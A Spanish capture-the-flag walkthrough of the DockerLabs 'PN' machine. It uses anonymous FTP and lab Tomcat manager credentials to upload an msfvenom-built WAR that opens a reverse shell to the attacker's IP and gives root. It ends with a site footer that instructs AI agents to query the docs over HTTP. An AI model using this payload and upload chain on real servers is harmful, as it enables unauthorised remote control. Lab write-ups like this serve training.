# MAQUINA PN (EXPLOIT UPLOAD .WAR TOMCAT - RCE 'MSFVENOM') Iniciamos la maquina. ![](/files/1w9aRPBWAUNQTp2qtq3p) Hacemos un ping a la ip para ver si tenemos conectividad, el ttl al ser 64 puede indicar que nos estamos enfrentando a una maquina Linux ![](/files/xUKMm2H9z6a9Xt7myQtc) Una vez que tengamos la ip usamos nmap para ver los servicios y puertos que corren en la maquina: ![](/files/sEhxu6rsbtnUWzkhPySE) El reporte de NMAP nos muestra que en el puerto ftp podemos loguearnos como anonymous entramos dentro sin proporcionar contraseña. Una vez dentro nos descargamos el archivo tomcat.txt ![](/files/Fsknq7Tk2GoH8PR1uvxq) El archivo tomcat.txt nos proporciona un usuario llamado "tomcat" ![](/files/fdHrk2PA51bhH6AuBQl3) Ahora entramos al servidor web que corren en el puerto 8080. ![](/files/3VFpFPsQYcvERmHeTsjA) Una vez ingresado vamos al apartado donde dice "manager webapp": Esto nos va a redirigir a un inicio de sesion el cual vamos a utilizar las siguiente credenciales: `user: tomcat password: s3cr3t` `Ya estamos dentro del tomcat.` ![](/files/xxzqgRGCTWtEsHX7WoQe) Hay una opción donde vamos a poder subir un archivo .war. ![](/files/0ravD6XcbVuRjAypNrNP) Para ellos vamos a usar msfvenom para crear nuestro payload: Este no funciona, pero hay que probar. ![](/files/W33CWvzodUURk3Ri7n5J) Este si funciona ![](/files/YKcgSOaacGjYtx5xqv0c) `msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.162 LPORT=443 -f war > reverse.war` Lista de payload msfvenom: [`https://www.nosolohacking.info/msfvenom-creando-diferentes-tipos-de-payloads/`](https://www.nosolohacking.info/msfvenom-creando-diferentes-tipos-de-payloads/) Una vez subido nos va a aparecer en el inicio, así que con en otra terminal nos ponemos en escucha con netcat y le damos 1 click y esperamos ![](/files/yg6DmXYcyGawC7ml16FK) ![](/files/Cilb5LVFNPaBBul02Z5a) Listo somos usuario root. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://1gnotus.gitbook.io/ignotus_pwn/dockerlabs/writeup/maquina-pn-exploit-upload-.war-tomcat-rce-msfvenom.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.